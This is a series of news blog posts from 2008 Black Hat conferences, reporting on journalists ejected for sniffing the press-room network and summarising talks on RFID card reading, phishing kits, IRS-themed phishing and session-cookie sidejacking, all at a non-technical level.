LAS VEGAS--On the second day of the Black Hat security conference, a trio of journalists turned on other journalists within the press room.
This was my ninth Black Hat in nine years, and I have lived in dread year after year that such a headline would affect me. On Thursday, CNET News was named as one of the two organizations "hacked," but I disagree that any such hack occurred.
Just before noon on Thursday, a trio of reporters from Global Security Mag sat in one of the two press rooms at Black Hat. Both rooms have a wired LAN that is a separate part of the wireless network open to all attending the security conference. What happened on Thursday was not a wireless attack--it is important to stress that. Most of the reporters in the press room are veterans of security conferences and take precautions against such attacks. Even so, the press room is separate from the conference and often a safe harbor for posting our stories to the Internet. Conference speakers and members of the Black Hat staff also use this network.
Mauro Israel, one of the Global Security Mag reporters, is alleged to have used a USB on his laptop to turn it into a gateway for all Internet packets going through the wired network switch located at each table in the room. In other words, he routed all the signals going through the LAN through his computer and used a program called Cain to view the packet information. It is unclear how long this was done. Log files seen by CNET News suggest it might have only been a short period before lunch on Thursday.
Cain, the tool used to view the packet information, can be a helpful network administrator tool. But in the wrong hands, it can also be used to gain access to a network in violation of federal wiretapping laws.
After lunch, Isreal, Dominique Jouniot, and Marc Brami from Global Security Mag moved to the table where I was sitting with my colleague Elinor Mills. I use a commercial encrypted VPN service to connect to my office remotely; Mills uses the corporate VPN we have at CNET. We suspect that when I left the table, the trio turned their attention to CNET. Mills, also a veteran of many security conferences, offers a first-person account of being targeted here.
The reporters' badges sit on a chair after they were confiscated.
(Credit: Declan McCullagh/CNET News)Ironically, I left the table to go and interview Aries Security, the guys running the Wall of Sheep, a project that passively monitors the wireless open network traffic at Black Hat and Defcon for the purposes of educating users on safe practices. What I didn't realize was that Brami, Jounio, and Isreal had been talking with the Wall of Sheep guys just prior to my arrival. One member of Aries Security, Riverside, even made a comment about "journalists hacking journalists."
I didn't get the reference at the time.
Apparently, Israel and his colleague tried moments before I arrived to get the usernames and passwords for reporters from eWeek and CNET added to the Wall of Sheep, a display of partially obscured usernames and passwords that is sometimes referred to as the "Wall of Shame." Riverside and others at Aries Security told them they would not post journalists' names to the Wall of Sheep because the press room was on a network separate from the one they were monitoring.
Another reporter that had been sitting in the Wall of Sheep room, Humphrey Cheung of TGDaily, overhead the conversation with Brami, became curious, and was allowed to take a photo of Israel's laptop screen. Those photos are important. The images that appear on the TGDaily site are redacted, of course. I later saw the originals.
What the trio of French reporters offered the Wall of Sheep was a Cain log with columns for timestamps, HTTP, client, username, and other information. From the log screen, it is apparent that on Thursday, beginning at 10:55 a.m., there were packets captured that were going out to eWeek.com. The IP address in the log resolved to a log-in page, presumably for a publishing tool used at that publication. The Wall of Sheep asks that submissions be done via Notepad file, so Israel pasted the username, password, and destination IP address into a file.
One eWeek reporter, Brian Prince, later confirmed his username and password were collected and displayed. eWeek immediately changed his password. Prince was not using a VPN for reasons he explained here.
But here's where it gets curious. A second line was added to the Notepad file, this one purportedly showing log-in information from news.cnet.com. When I saw the un-redacted photo, I knew instantly that the reference to CNET was a fake. My colleague Declan McCullagh resolved the IP address given as the destination to the CNET News home page--not a tool page, but our standard home page. That could be explained as anyone in the press room could have surfed to that page.
What tipped me off that the reference to CNET was truly bogus is that the username was a word within the code of the home page, a word anyone might find by right clicking and viewing the page source. Second, the password "control" wasn't strong enough, nor did it belong to Declan, Elinor, or myself. It was a fake.
I went back to the Wall of Sheep. Riverside was incredibly helpful, confirming that reporters from Global Security Mag had been there offering some log data. He even had the business card for Marc Brami, director of the publication. Moments later, a spokesperson for Black Hat confirmed that conference officials were looking for Brami and his colleagues as well. The three were later required to leave the conference and are banned for life from Black Hat and its sister conference, Defcon.
What I don't understand is if this was a prank--as Brami has suggested to Mills--then why didn't they simply say to Prince or anyone else in the press room that they could see their network communications? And, if they simply wanted to send a message to U.S. journalists about laptop security--as they reportedly suggested to the Black Hat officials--why did they apparently lie about CNET also being exposed?
A strange thing happened on Thursday. As the story unfolded, reporters from competing publications gathered in the press room. It was a bonding moment. The protected network in any press room is a circle of trust, and when that trust is violated, bad things can happen. Potentially everyone in the room had been a victim. And as such, we rallied around each other for support.
As a result of Thursday night's events, I think I know my security colleagues a little better, and that's a good thing. They're good, hard-working reporters. But in the future, if anyone I don't know joins me at a press table, I'm going to interrogate them, and a few others have told me they will as well, and that's a bad thing.
Like the biblical story, this instance of Cain has also brought evil into a world that was previously safe and welcoming.
Kurt Opsahl, left, a senior staff attorney at the Electronic Frontier Foundation, discusses the ejection of the three French journalists over networking snooping allegations.
(Credit: Declan McCullagh/CNET News)
LAS VEGAS--This year marks my ninth year of attending Black Hat in Las Vegas. From a small gathering of security professionals in 2000 to an uberconference in 2008, Black Hat has scaled well. And the transition from private company to corporate-owned also appears smooth. But hardly anyone's here yet.
On Tuesday, there are only a thousand or so attendees of the 30-some training sessions. Already I've noticed a few minor changes from last year.
The press room is now on the third floor, away from the maddening crowds. This may or may not work since almost all the sessions are on the fourth floor. So far the escalators have been jammed during breaks and it will only get worse as Black Hat ramps up.
Lunch, served in a tent located in the front of Caesar's Palace, is now buffet as opposed to being a serviced meal. This gives quicker access to the food (no more waiting until everyone at your table had finished a course before the next course was served). However the buffet itself (at least four different food stations) also removed a good chunk of tables and seats. By my count only one thousand people can eat at one time.
To accommodate the rest of us, Black Hat is also serving boxed lunches on the third floor. My lunch ticket is for a boxed lunches. I suspect that vendors and press will be shunted into the cold box-lunch room.
There are about 30 vendors set up across from the Augustus ballrooms. Last year it was impossible to move from session to session without bumping into the vendor tables. While this year's location is better, it's still not ideal. Perhaps next year Black Hat will simply shunt the vendors into a separate room. Those who want to chit-chat with the vendors can do so, while the rest of us get to our sessions unimpeded.
The hall for Dan Kaminsky's DNS talk seems too small. Maybe they'll simulcast it on jumbo screens in the hallway. We'll see on Wednesday.
Jeff Moss, founder and director of Black Hat, on Thursday moderated the first-ever Black Hat Webinar, previewing five presentations to be given at the security conference in Las Vegas in August.
Moss said he was pleased that more than 1,000 people attended and admitted they were "expecting maybe a few hundred." Black Hat has already implemented RSS feeds, Twitter, and even a LinkedIn group.
"The Webinars will be much more than that," Moss said. In the future, he hinted, Black Hat will publish an editorial calendar, with a new Webinar at least once a month. Moss said that if successful, future Webinars might also include online training.
During the one-hour broadcast, speakers gave 10-minute previews of five presentations expected during the Black Hat briefings in Las Vegas, which will take place August 6-7.
Bruce Potter, founder of the Shmoo Group, talked about "malware detection through network flow analysis." He said he will be releasing some software at the conference. He argued that network administrators can examine data flowing both ways on the network to help identify where the attacker is coming from. Software expected in August includes an updated version of Psyche that will have an Ajax-based interface.
Fyodor Vaskovich, founding member of the Honeynet project, talked about "Nmap--Scanning the Internet." The author of NMAP recently scanned the entire Internet--the WorldScan Project--and will present his results. This allows him to verify and refute various assumptions about which ports to use for scanning. Also, he said, it forces him to improve NMAP.
He gave a few examples of a NMAP scripting engine, fixed-rate packet sending, enhanced version detection, and improvements to performance and accuracy.
Shawn Moyer, CISO of Agura Digital Security, and Nathan Hamiel, senior consultant for Idea Information Security and founder of the Hexagon Security Group, previewed their talk "Satan is on My Friends List: Attacking Social Networks." They said they're not just talking about worm attacks such as Samy back in 2005. They're talking about user-generated applications and content--are they creating new attack surfaces? They will also have demonstrations and screen captures to share in August.
Nathan McFeters and John Heasman talked about "Beyond document.cookie." In August they'll be joined by Rob Carter in talking about Web 2.0 same-origin policy attacks and other Web 2.0 vulnerabilities.
Steve Reavey, Katie Moussouris, and Steve Adegbite, all of Microsoft, talked about "Secure the Planet! New Strategic Initiatives from Microsoft to Rock Your World" or the shorter title "Has Microsoft lost its mind?" Among other things, they said they will talk about how Microsoft approaches a security update within Office, from vulnerability disclosure to patch. Microsoft will also be hosting a two-day "Defending the Flag" training just prior to the public part of Black Hat on August 2 and 3, and again on August 4 and 5, to show administrators how to attack Microsoft products to gain insight to how their networks are secured.
After a short question-and-answer period, Moss said the next Webinar will be held "in about a month" and offered an e-mail address (subscribe-webcasts@blackhat.com) to subscribe for updates.
On Wednesday, Black Hat officials opened their Call For Papers (CFP) site to paid attendees registered for this summer's Black Hat USA 2008 Briefings and Trainings.
In February, speaking at Black Hat D.C. 2008, director Jeff Moss said his idea is to make the redesigned Black Hat Web site more interactive between speakers and attendees. The first improvement is to give future attendees a voice in choosing what speakers and presentations they'd like to see. Black Hat USA 2008, to be held August 2-7 at Caesar's Palace in Las Vegas, is the first conference to offer this function.
Moss said in an e-mail that the "ratings will help us create the show you want to attend, and even help focus presentations as they're being created. We are excited to see what kind of information we learn about what interests our delegates and what kind of talks meet their needs best."
At present, the Black Hat CFP lists more than 80 submissions. The submission period will continue through May 1, when final selection will begin.
Approved talks will then be programmed into a dozen topic-based tracks, including Zero Day, Zero Day Defense, Application Security 1.0/2.0, Bots and Stuff, Covert, Deep Knowledge, Forensics & Anti-Forensics, Hardware, the Network, New Hotness, Over the Air (OTA), Privacy and Anonymity, and Turbo Talks. A new track, Un-Track, will be an opportunity for attendees and presenters to talk after a session, and was tested after sessions in Washington, D.C.
Moss also hinted that future improvements to the Black Hat site may include online forums.
Breaking things--that's what the very bright and super curious do; they look beyond the obvious to see what's truly lurking beneath the surface. On Wednesday and Thursday, attendees at Black Hat D.C. 2008 got a window into the latest research being done on Web applications, wireless, and embedded technologies.
On Wednesday, researchers David Hulton and "Steve" showed how with about $1,000 with of equipment they can decrypt A5/1 cellular GSM traffic in less than a hour. Following that, Adam Laurie reprised his popular RFIDiots talk from last year's Black Hat briefings with a new program that allows him to read the data off smart credit cards "hands free."
Wednesday night included a social. There was also a speaker from the Washington, D.C.-based Spy Museum with stories of real-life spies.
On Thursday, Tiller Beauchamp and David Weston gave a presentation on DTrace, a security research application that is now available within Mac OS X Leopard and coming soon to various distributions of Linux. Following that, Zac Franken reprised his previous talk on biometric and token-based access control systems with new information on work access cards. After lunch, talks included Chris Wysopal on classification and detection of backdoors, Jason Larson on SCADA security, and Jon Oberheide on exploiting virtual machine migrations.
Update on February 22, 2008, at 3:20 p.m PST: This blog has been updated to include a response from American Express.
WASHINGTON D.C.--Adam Laurie, an RFID security expert, used the Black Hat DC 2008 conference here, to demonstrate a new Python script he's working on to read the contents of smart-chip-enabled credit cards.
As part of his presentation Wednesday, Laurie asked for someone from the audience to volunteer a smart card. Without taking the card out of the volunteer's wallet, Laurie both read and displayed its contents on the presentation screen--the person's name, account number, and expiration clearly visible.
Demonstrations like that show the potential misuse of RFID technology in the near future. Without touching someone, a thief could sniff the contents of an RFID-enabled credit card just in passing. The same is true for embedded RFID chips in the human body, work access badges, some public transit cards, and even the new passports in use in more than 45 countries.
As a disclaimer, Laurie said he spoke to American Express, the company that issued the volunteer's card. Laurie said that American Express told him: "We are comfortable with the security of our product." Laurie added that the company told him the number he displayed on the presentation screen was not the account number printed on the card, which Laurie proved by opening the wallet and comparing.
"The alias number on American Express' ExpressPay cannot be used for online transactions," said Molly Faust, American Express' Public Affairs representative, in an e-mail to CNET News.com. "ExpressPay has multiple security mechanisms. As the payment host, American Express would not verify/authorize an online transaction using just the alias account number. There are several other security mechanisms that would be required in order for payment authorization to take place."
The credit card industry has argued that use of the RFID-enabled cards will save customers time when processing payments.
An extreme example can be found in Spain. Laurie said a public beach there encourages visitors to have RFID tags injected into their bodies. The point? Merchants along the beach scan your wrist to obtain a unique ID from which they can debit your account. The advantage? You won't have to go to the beach with your wallet, which might get stolen.
Laurie, who has an injected RFID-tag, showed how easy it was not only to read the tag, but also to re-write the tag. During his demo, he used the coding sequence reserved for animal tagging to have his RFID chip declare him an animal.
On his RFIDiot Web site, Laurie offers the Python scripts free of charge and also sells the hardware necessary to read and write to RFID tags and cards.
Washington D.C. -- On Wednesday, in a talk at Black Hat D.C. 2008, two researchers set out to see whether phishing sites were created by the "Einsteinian, ninja hackers that the media makes them out to be."
In a talk titled "Bad Sushi: Beating Phishers at their own game," Nitesh Dhanjani and Billy Rios found not a sophisticated gang of elite coders, but hundreds of bad coders all copying one another, and often stealing from each other.
Dhanjani and Rios expressed disapproval of antiphishing products that use black lists to block known phishing sites. One, because some legitimate server admins might have their compromised account password visible on such lists. Two, because the researchers were able to open those lists and see the servers that were being compromised.
They followed one of the servers that had shown up on one black list multiple times. What they found was a poorly configured Internet-facing server, one that was easily compromised, and therefore hosting several phishing sites.
Once they found a compromised Web server, they then wondered: how hard is it to create an authentic-looking phishing site? Dhanjani and Rios found kits online, prepackaged with images and forms from Bank of America, Citibank, and PayPal, among others. Just install one of these kits on a compromised server and you're in business.
Looking deeper into the code used in these kits, they found that one kit had been copied many times, with different images. Moreover, the creator of the kit was skimming off the people using the kit; every time someone fell for a phishing site, their personal data not only went to the phisher who put up the site, but also to the author who wrote the kit.
With personal information flowing in, what does the average phisher do next? Dhanjani and Rios googled to find sites trading personal data--not a surprising find. What they found was that U.S. and U.K. IDs often sold for much less than European and Asian data. They could not account for the difference.
They also found forums and sites dedicated to ATM "skimming." Skimming is the physical use of secondary readers and keypads on ATMs used to capture account numbers and PINs. Often the ATM transaction goes through, and the customer doesn't realize the account has been compromised until later.
Dhanjani and Rios suggested that site administrators should lock down their sites so that phishing kits don't take root. They also suggested that sites require more security in order to raise the bar. By requiring a customer to use two-factor authentication, or a persistent cookie, many of the financial phishing sites would cease to be effective, they said.
Washington D.C. -- Like the Bank of America brand name, the United States Internal Revenue Service is a brand that also needs online protection. On Wednesday, Special Agent Andy Fried with the U.S. Treasury Department gave a second keynote address to start off Black Hat DC 2008. He said as of February 19 this year, there were 1,630 phishing sites using the IRS name or logo, marking a 12 percent to 17 percent increase over last year.
Although the IRS phishing sites may be taken down with an hour or so, that's still long enough for a victim to volunteer personal information online. Fried stated that the IRS does not contact people via e-mail. He also noted that many of the phishing sites and e-mails came "out of Eastern Europe."
While he was concerned about ordinary people getting hit, he called upon the antivirus community to immunize their applications before the IRS staff reported for work in the morning. His concern was the IRS itself, which, in the morning would start to get forwarded examples of the e-mail and could potentially infect the IRS with malware.
In January 2008, Fried said that the IRS reached a full one percent of all spam traded on the Internet--a record for the agency.
Fried also warned against using peer-to-peer applications on the same desktop with your tax information on it. He and his investigators will periodically fire up LimeWire and find hundreds of copies of people's tax returns available for downloading. "If you don't know what you are doing with P2P," said Fried, "don't use it."
Fried said he expected more IRS-themed Internet activity in May when the U.S. government plans to issue tax rebates to qualified individuals, but declined to specify what he expected.
WASHINGTON--On Wednesday, Black Hat D.C. 2008 gets under way, after two days of intense training sessions. The D.C. Black Hat security conference is much smaller than the summer Black Hat USA in Las Vegas. But what D.C. lacks in size, it makes up for in sessions and talks.
On tap for Wednesday is a keynote speech from Jerry Dixon, former director of the National Cyber Security Division, Department of Homeland Security. Following the keynote address will be two parallel tracks of programming--Web app and wireless--including presentations from Chuck Willis of Mandiant on forensic challenges of cross site scripting, Adam Laurie on practical RFID hacking, Nitesh Dhanjani and Billy Rios on beating phishers, Sachin Joglekar and Sundeep Patwardhan on attacks on VoIP through IPSec tunnels, and Neal Krawetz on image analysis.
Thursday will continue with two parallel tracks--defense and hardware/embedded--and will include Christopher Tarnovsky discussing security failures in secure devices, Zac Franken on biometrics, as well as others.
Throughout the two-day event there will be various birds-of-a-feather talks, opportunities to talk to session speakers, and on Wednesday evening, additional speakers.
Robert Graham, CEO of Errata Security, who last year found that it's possible to capture someone's session cookie via wireless eavesdropping, now says that even encrypted services such as Google's Gmail can sometimes provide him with a session cookie. This is a departure from his advice last August when he said SSL HTTPS sessions of Gmail should be immune.
Graham, working with David Maynor, created two tools (Ferret and Hamster), which together help him grab session cookies out of thin air, say, at a local hot spot, like an Internet cafe. Session cookies allow you to shop at an e-commerce site, then leave the page and return later without re-entering your password. One doesn't have to decode the user's password to exploit the session cookie, merely possess it.
Graham gave a live demonstration of his sidejack attack on an audience member's Gmail account at last year's Black Hat USA, displaying that person's inbox before a standing-room-only crowd.
Now Graham says that Gmail, in particular, will sometimes connect to a hot spot first via Javascript rather than SSL, and this allows his tool to grab the session cookie and thus read someone else's e-mail. The same could be true with Amazon.com and other Web 2.0 sites.
"In theory, Graham says, "using the HTTPS version of Gmail should protect you by going to https://mail.google.com/mail, but this doesn't work as you think. The JavaScript code uses an XMLHttpRequest object to make HTTP requests in the background. These are also SSL encrypted by default, but they become unencrypted if SSL fails."
Graham provides more details in his blog.
